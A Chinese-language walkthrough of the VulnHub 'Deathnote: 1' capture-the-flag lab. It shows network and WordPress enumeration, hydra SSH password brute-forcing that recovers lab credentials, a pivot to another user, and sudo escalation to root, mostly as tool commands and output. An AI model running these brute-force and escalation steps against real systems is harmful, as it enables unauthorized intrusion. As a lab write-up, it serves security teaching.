Deathnotes
作者:jason_huawen
靶机基本信息
名称:Deathnote: 1
地址:
https://www.vulnhub.com/entry/deathnote-1,739/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:a6:91:71 1 60 PCS Systemtechnik GmbH
192.168.56.205 08:00:27:6a:7a:fa 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.205
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-16 08:09 EST
Nmap scan report for 192.168.56.205
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
| 256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_ 256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:6A:7A:FA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH),80(HTTP)
获得Shell
浏览器访问80端口时,重定向到deathnote.vuln,将其加入到/etc/hosts文件中
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.205 deathnote.vuln
刷新页面,有个链接:HINT,Find a notes.txt file on server
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ nikto -h http://deathnote.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2023-01-16 08:44:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: c5, size: 5cb285991624e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-16 08:44:57 (GMT-5) (47 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ nikto -h http://deathnote.vuln/wordpress/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2023-01-16 08:45:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-01-16 08:45:57 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/16 08:46:25 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/server-status (Status: 403) [Size: 279]
Progress: 216128 / 220561 (97.99%)===============================================================
2023/01/16 08:46:47 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2023/01/16 08:47:02 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 197]
/.html (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt (Status: 200) [Size: 68]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101050 / 1102805 (99.84%)===============================================================
2023/01/16 08:48:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://deathnote.vuln/wordpress/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,sh,html
[+] Timeout: 10s
===============================================================
2023/01/16 08:49:11 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-content (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-login.php (Status: 200) [Size: 6799]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/readme.html (Status: 200) [Size: 7346]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://deathnote.vuln/wordpress/wp-login.php?action=register]
Progress: 1100068 / 1102805 (99.75%)===============================================================
2023/01/16 08:51:15 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wpscan --url http://deathnote.vuln/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://deathnote.vuln/wordpress/ [192.168.56.205]
[+] Started: Mon Jan 16 08:52:43 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
| Found By: Rss Generator (Passive Detection)
| - http://deathnote.vuln/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.8</generator>
| - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jan 16 08:52:46 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.702 KB
[+] Data Received: 444.821 KB
[+] Memory used: 234.879 MB
[+] Elapsed time: 00:00:03
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wpscan --url http://deathnote.vuln/wordpress -U kira -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
密码没有破解出来
注意不能用浏览器去访问,而是用curl或者wget去访问资源
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ curl http://deathnote.vuln/robots.txt
fuck it my dad
added hint on /important.jpg
ryuk please delete it
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ wget http://deathnote.vuln/important.jpg
--2023-01-16 09:13:29-- http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)... 192.168.56.205
Connecting to deathnote.vuln (deathnote.vuln)|192.168.56.205|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’
important.jpg 100%[====================================================>] 277 --.-KB/s in 0s
2023-01-16 09:13:29 (78.8 MB/s) - ‘important.jpg’ saved [277/277]
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ls -alh
total 16K
drwxr-xr-x 2 kali kali 4.0K Jan 16 09:13 .
drwxr-xr-x 24 kali kali 4.0K Jan 16 08:07 ..
-rw-r--r-- 1 kali kali 277 Aug 29 2021 important.jpg
-rw-r--r-- 1 root root 939 Jan 16 08:09 nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ steghide extract -sf important.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ stegseek important.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "important.jpg" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ binwalk -e important.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ls
important.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ cat important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important
login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$
important.jpg虽然扩展名是jpg,但是其实是文本文件。
密码在Hint区域,那应该就是:## iamjustic3
因此用户名是kira,登录wordpress后台,不能直接通过替换404模板方式上传shell.php
在media发现了notes.txt文件,其URL为:
http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
是个密码字典,用该字典去破解用户:kira以及网页中出现的L用户
──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l kira -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:22:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:22:39
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l L -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:22:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:22:58
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ hydra -l l -P dict ssh://192.168.56.205
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 09:23:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://192.168.56.205:22/
[22][ssh] host: 192.168.56.205 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 09:23:12
┌──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ ssh l@192.168.56.205
The authenticity of host '192.168.56.205 (192.168.56.205)' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.205' (ED25519) to the list of known hosts.
l@192.168.56.205's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:12:29 2021 from 192.168.1.6
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$ ls -alh
total 36K
drwxr-xr-x 4 l l 4.0K Sep 4 2021 .
drwxr-xr-x 4 root root 4.0K Jul 19 2021 ..
-rw------- 1 l l 3 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3.5K Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4.0K Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwx------ 2 l l 4.0K Sep 4 2021 .ssh
-rw-r--r-- 1 root root 512 Jul 19 2021 user.txt
l@deathnote:~$ cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
l@deathnote:~$
为brainfuck编码:
i think u got the shell , but you wont be able to kill me -kira
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls -alh
total 12K
drwxr-xr-x 2 kira kira 4.0K Jul 19 2021 .
drwxr-xr-x 4 kira kira 4.0K Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$ ssh kira@127.0.0.1
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 4 06:00:09 2021 from 127.0.0.1
kira@deathnote:~$
kira@deathnote:~$ cat kira.txt
cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp
kira@deathnote:~$
──(kali㉿kali)-[~/Vulnhub/Deathnotes]
└─$ echo 'cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp' | base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$ cd /opt
kira@deathnote:/opt$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 29 2021 .
drwxr-xr-x 18 root root 4.0K Jul 19 2021 ..
drwxr-xr-x 4 root root 4.0K Aug 29 2021 L
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29 2021 .
drwxr-xr-x 3 root root 4.0K Aug 29 2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29 2021 kira-case
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Aug 29 2021 .
drwxr-xr-x 4 root root 4.0K Aug 29 2021 ..
-rw-r--r-- 1 root root 84 Aug 29 2021 case.wav
-rw-r--r-- 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$ cd ..
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29 2021 .
drwxr-xr-x 3 root root 4.0K Aug 29 2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29 2021 kira-case
kira@deathnote:/opt/L$ cd kira-case/
kira@deathnote:/opt/L/kira-case$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 29 2021 .
drwxr-xr-x 4 root root 4.0K Aug 29 2021 ..
-rw-r--r-- 1 root root 295 Aug 29 2021 case-file.txt
kira@deathnote:/opt/L/kira-case$ cat case-file.txt
the FBI agent died on December 27, 2006
1 week after the investigation of the task-force member/head.
aka.....
Soichiro Yagami's family .
hmmmmmmmmm......
and according to watari ,
he died as other died after Kira targeted them .
and we also found something in
fake-notebook-rule folder .
kira@deathnote:/opt/L/kira-case$
根据提示用cyberchef解码得到:passwd : kiraisevil
很容易猜到这个是kira的密码:
kira@deathnote:/opt/L/kira-case$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/kira-case$ sudo /bin/bash
root@deathnote:/opt/L/kira-case# cd /root
root@deathnote:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Sep 4 2021 .
drwxr-xr-x 18 root root 4.0K Jul 19 2021 ..
-rw------- 1 root root 35 Sep 4 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 19 2021 .local
-rw------- 1 root root 190 Jul 19 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 957 Jul 19 2021 root.txt
root@deathnote:~# cat root.txt
:::::::: :::::::: :::: ::: :::::::: ::::::::: ::: ::::::::::: ::::::::
:+: :+: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#+ +:+ +#+ +:+ +#+ :#: +#++:++#: +#++:++#++: +#+ +#++:++#++
+#+ +#+ +#+ +#+ +#+#+# +#+ +#+# +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######## ######## ### #### ######## ### ### ### ### ### ########
##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~#
成功提权,并拿到flag
经验教训
- 本靶机应该是一路有提示的,但是在访问/robots.txt文件的时候返回不存在,此时应该尝试curl等命令行方法